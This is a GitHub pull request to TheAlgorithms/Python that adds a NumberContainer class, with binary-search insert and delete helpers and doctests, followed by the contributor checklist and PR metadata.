>>> NumberContainer().binary_search_delete([-1, -1, -1], -1) + [-1, -1] + >>> NumberContainer().binary_search_delete([-1, 0], 0) + [-1] + >>> NumberContainer().binary_search_delete([-1, 0], -1) + [0] + >>> NumberContainer().binary_search_delete(range(7), 3) + [0, 1, 2, 4, 5, 6] + >>> NumberContainer().binary_search_delete([1.1, 2.2, 3.3], 2.2) + [1.1, 3.3] + >>> NumberContainer().binary_search_delete("abcde", "c") + ['a', 'b', 'd', 'e'] + >>> NumberContainer().binary_search_delete([0, -1, 2, 4], 0) + Traceback (most recent call last): + ... 
+ ValueError: Either the item is not in the array or the array was unsorted + >>> NumberContainer().binary_search_delete([2, 0, 4, -1, 11], -1) + Traceback (most recent call last): + ... + ValueError: Either the item is not in the array or the array was unsorted + >>> NumberContainer().binary_search_delete(125, 1) + Traceback (most recent call last): + ... + TypeError: binary_search_delete() only accepts either a list, range or str + """ + if isinstance(array, (range, str)): + array = list(array) + elif not isinstance(array, list): + raise TypeError( + "binary_search_delete() only accepts either a list, range or str" + ) + + low = 0 + high = len(array) - 1 + + while low <= high: + mid = (low + high) // 2 + if array[mid] == item: + array.pop(mid) + return array + elif array[mid] < item: + low = mid + 1 + else: + high = mid - 1 + raise ValueError( + "Either the item is not in the array or the array was unsorted" + ) + + def binary_search_insert(self, array: list | str | range, index: int) -> list[int]: + """ + Inserts the index into the sorted array + at the correct position. + + >>> NumberContainer().binary_search_insert([1,2,3], 2) + [1, 2, 2, 3] + >>> NumberContainer().binary_search_insert([0,1,3], 2) + [0, 1, 2, 3] + >>> NumberContainer().binary_search_insert([-5, -3, 0, 0, 11, 103], 51) + [-5, -3, 0, 0, 11, 51, 103] + >>> NumberContainer().binary_search_insert([-5, -3, 0, 0, 11, 100, 103], 101) + [-5, -3, 0, 0, 11, 100, 101, 103] + >>> NumberContainer().binary_search_insert(range(10), 4) + [0, 1, 2, 3, 4, 4, 5, 6, 7, 8, 9] + >>> NumberContainer().binary_search_insert("abd", "c") + ['a', 'b', 'c', 'd'] + >>> NumberContainer().binary_search_insert(131, 23) + Traceback (most recent call last): + ... + TypeError: binary_search_insert() only accepts either a list, range or str + """ + if isinstance(array, (range, str)): + array = list(array) + elif not isinstance(array, list): + raise TypeError( + "binary_search_insert() only accepts either a list, range or str" + ) + + low = 0 + high = len(array) - 1 + + while low <= high: + mid = (low + high) // 2 + if array[mid] == index: + # If the item already exists in the array, + # insert it after the existing item + array.insert(mid + 1, index) + return array + elif array[mid] < index: + low = mid + 1 + else: + high = mid - 1 + + # If the item doesn't exist in the array, insert it at the appropriate position + array.insert(low, index) + return array + + def change(self, index: int, number: int) -> None: + """ + Changes (sets) the index as number + + >>> cont = NumberContainer() + >>> cont.change(0, 10) + >>> cont.change(0, 20) + >>> cont.change(-13, 20) + >>> cont.change(-100030, 20032903290) + """ + # Remove previous index + if index in self.indexmap: + n = self.indexmap[index] + if len(self.numbermap[n]) == 1: + del self.numbermap[n] + else: + self.numbermap[n] = self.binary_search_delete(self.numbermap[n], index) + + # Set new index + self.indexmap[index] = number + + # Number not seen before or empty so insert number value + if number not in self.numbermap: + self.numbermap[number] = [index] + + # Here we need to perform a binary search insertion in order to insert + # The item in the correct place + else: + self.numbermap[number] = self.binary_search_insert( + self.numbermap[number], index + ) + + def find(self, number: int) -> int: + """ + Returns the smallest index where the number is. 
+ + >>> cont = NumberContainer() + >>> cont.find(10) + -1 + >>> cont.change(0, 10) + >>> cont.find(10) + 0 + >>> cont.change(0, 20) + >>> cont.find(10) + -1 + >>> cont.find(20) + 0 + """ + # Simply return the 0th index (smallest) of the indexes found (or -1) + return self.numbermap.get(number, [-1])[0] + + +if __name__ == "__main__": + import doctest + + doctest.testmod()
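To make the behaviour of the `NumberContainer` class added in this diff concrete, here is a minimal usage sketch. It assumes the file lands at `other/number_container_system.py` exactly as the diff adds it and that the script runs from the repository root; the index and number values are arbitrary examples:

```python
# Illustration only: assumes other/number_container_system.py exists as added
# by the diff above and that this script runs from the repository root.
from other.number_container_system import NumberContainer

container = NumberContainer()
container.change(10, 5)  # index 10 now holds the number 5
container.change(2, 5)   # index 2 also holds 5; 2 becomes the smallest index for 5
container.change(10, 7)  # index 10 is reassigned to 7, so 5 remains only at index 2

print(container.find(5))   # 2  -> smallest index currently holding 5
print(container.find(7))   # 10
print(container.find(42))  # -1 -> 42 is not stored at any index
```

Each `find` call returns the smallest index currently mapped to the queried number, or -1 when the number is not stored anywhere, matching the doctests in the diff.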
### Describe your change: Implements a number container system algorithm which stores indexes and numbers at these corresponding indexes. * [x] Add an algorithm? * [ ] Fix a bug or typo in an existing algorithm? * [ ] Documentation change? ### Checklist: * [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md). * [x] This pull request is all my own work -- I have not plagiarized. * [x] I know that pull requests will not be merged if they fail the automated tests. * [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms. * [x] All new Python files are placed inside an existing directory. * [x] All filenames are in all lowercase characters with no spaces or dashes. * [x] All functions and variable names follow Python naming conventions. * [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html). * [x] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing. * [x] All new algorithms include at least one URL that points to Wikipedia or another similar explanation. * [x] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
https://api.github.com/repos/TheAlgorithms/Python/pulls/8808
2023-06-07T21:44:26Z
2023-06-08T12:40:39Z
2023-06-08T12:40:39Z
2023-06-08T14:06:09Z
2,422
TheAlgorithms/Python
29,929